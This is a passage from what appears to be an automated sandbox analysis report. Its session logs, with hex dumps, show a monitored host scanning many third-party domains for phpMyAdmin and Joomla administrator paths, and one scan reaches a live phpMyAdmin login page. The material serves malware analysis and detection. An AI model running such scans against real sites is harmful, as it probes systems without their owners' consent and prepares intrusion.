Ascii: > <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <title>cm.cz</title> <script src="//www.google.com/adsense/domains/caf.js?abp=1"
2023-11-30 10:22:38 UTC	538	IN	Data Raw: 69 74 65 64 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 3b 0a 7d 0a 0a 2e 73 61 6c 65 5f 6c 69 6e 6b 5f 62 6f 6c 64 20 61 2c 0a 2e 73 61 6c 65 5f 6c 69 6e 6b 2c 0a 2e 73 61 6c 65 5f 6c 69 6e 6b 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 73 65 61 72 63 68 48 6f 6c 64 65 72 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 70 78 20 30 20 31 70 78 20 31 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 72 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 39 35 25 3b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 35 30 30 70 78 3b 0a 7d 0a 0a 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 30 30 70 78 29 20 7b 0a 0a 20 20 Data Ascii: ited { color:#626574;}.sale_link_bold a,.sale_link,.sale_link a { color:#626574 !important;}.searchHolder { padding:1px 0 1px 1px; margin:1rem auto; width: 95%; max-width: 500px;}@media screen and (min-width:600px) {
2023-11-30 10:22:38 UTC	4744	IN	Data Raw: 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 74 68 65 6d 65 73 2f 63 6c 65 61 6e 50 65 70 70 65 72 6d 69 6e 74 42 6c 61 63 6b 5f 36 35 37 64 39 30 31 33 2f 69 6d 67 2f 61 72 72 6f 77 73 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 74 6f 70 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 3b 0a 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 36 30 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 77 72 61 70 70 65 72 33 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 35 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f Data Ascii: udfront.net/themes/cleanPeppermintBlack_657d9013/img/arrows.png') no-repeat center top; padding-bottom:0; min-height:600px; } .wrapper3 { max-width:530px; background:none; }}</style> <meta name="descriptio
2023-11-30 10:22:38 UTC	5930	IN	Data Raw: 20 20 20 20 20 20 20 7d 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 28 65 72 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 79 6e 74 61 78 45 72 72 6f 72 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 65 72 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 63 6f 6e 74 61 69 6e 65 72 4e 61 6d 65 20 69 6e 20 63 6f 6e 74 61 69 6e 65 72 4e 61 6d 65 73 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 64 61 74 61 20 3d 20 7b 0a 20 Data Ascii: })); } } catch (err) { if (!(err instanceof SyntaxError)) { throw err; } } } else if (containerName in containerNames) { var data = {
2023-11-30 10:22:38 UTC	2810	IN	Data Raw: 61 76 61 73 63 72 69 70 74 22 3e 78 28 70 61 67 65 4f 70 74 69 6f 6e 73 2c 20 7b 72 65 73 75 6c 74 73 50 61 67 65 42 61 73 65 55 72 6c 3a 20 27 2f 2f 63 6d 2e 63 7a 2f 3f 74 73 3d 66 45 4e 73 5a 57 46 75 55 47 56 77 63 47 56 79 62 57 6c 75 64 45 4a 73 59 57 4e 72 66 48 77 31 59 32 55 34 4e 48 78 69 64 57 4e 72 5a 58 51 77 4d 54 45 73 59 6e 56 6a 61 32 56 30 4d 44 63 33 66 48 78 38 66 48 78 38 4e 6a 55 32 4f 44 59 79 4e 6d 55 32 4e 57 49 32 4d 58 78 38 66 44 45 33 4d 44 45 7a 4d 7a 6b 33 4e 54 67 75 4e 44 4d 79 4d 58 78 69 4d 6a 4a 68 59 32 59 35 59 6a 55 77 59 7a 68 6b 4f 44 49 77 4f 54 55 32 5a 47 52 6a 59 57 49 35 4e 7a 45 30 4e 6d 46 6c 4d 54 59 31 4f 57 49 35 4d 7a 5a 68 66 48 78 38 66 48 77 78 66 48 77 77 66 44 42 38 66 48 78 38 4d 58 78 38 66 48 78 Data Ascii: avascript">x(pageOptions, {resultsPageBaseUrl: '//cm.cz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTEsYnVja2V0MDc3fHx8fHx8NjU2ODYyNmU2NWI2MXx8fDE3MDEzMzk3NTguNDMyMXxiMjJhY2Y5YjUwYzhkODIwOTU2ZGRjYWI5NzE0NmFlMTY1OWI5MzZhfHx8fHwxfHwwfDB8fHx8MXx8fHx
2023-11-30 10:22:38 UTC	7	IN	Data Raw: 0d 0a 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	59061	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:39 UTC	230	OUT	GET /pma/ HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:40 UTC	717	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:40 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	59725	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:40 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:40 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.4	59584	104.238.144.219	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	170	OUT	GET /phpmyadmin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:40 UTC	803	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 37 2e 34 2e 33 33 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 31 30 38 30 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 68 70 4d 79 41 64 6d 69 6e 5f Data Ascii: HTTP/1.1 200 OKDate: Thu, 30 Nov 2023 10:22:40 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6X-Powered-By: PHP/7.4.33Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: private, max-age=10800Set-Cookie: phpMyAdmin_
2023-11-30 10:22:40 UTC	1248	IN	Data Raw: 34 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 68 70 4d 79 41 64 6d 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 Data Ascii: 4d4<!DOCTYPE HTML><html lang="en" dir="ltr"><head> <link rel="icon" href="favicon.ico" type="image/x-icon"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"> <title>phpMyAdmin</title> <meta charset="utf-8"> <style t

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	59803	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:40 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:40 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	59583	15.197.172.60	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	282	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.88; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:40 UTC	765	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 33 3a 32 33 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 34 33 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:33:23 GMTConnection: closeETag: "6552b243-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:40 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	59873	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	179	OUT	GET /administrator/index.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:40 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:40 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	59872	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	179	OUT	GET /administrator/index.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:40 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:40 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	60176	104.238.144.219	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	170	OUT	GET /phpmyadmin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:40 UTC	803	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 37 2e 34 2e 33 33 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 31 30 38 30 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 68 70 4d 79 41 64 6d 69 6e 5f Data Ascii: HTTP/1.1 200 OKDate: Thu, 30 Nov 2023 10:22:40 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6X-Powered-By: PHP/7.4.33Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: private, max-age=10800Set-Cookie: phpMyAdmin_
2023-11-30 10:22:40 UTC	1248	IN	Data Raw: 34 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 68 70 4d 79 41 64 6d 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 Data Ascii: 4d4<!DOCTYPE HTML><html lang="en" dir="ltr"><head> <link rel="icon" href="favicon.ico" type="image/x-icon"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"> <title>phpMyAdmin</title> <meta charset="utf-8"> <style t

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	60072	194.63.248.47	443

Timestamp	Bytes transferred	Direction	Data
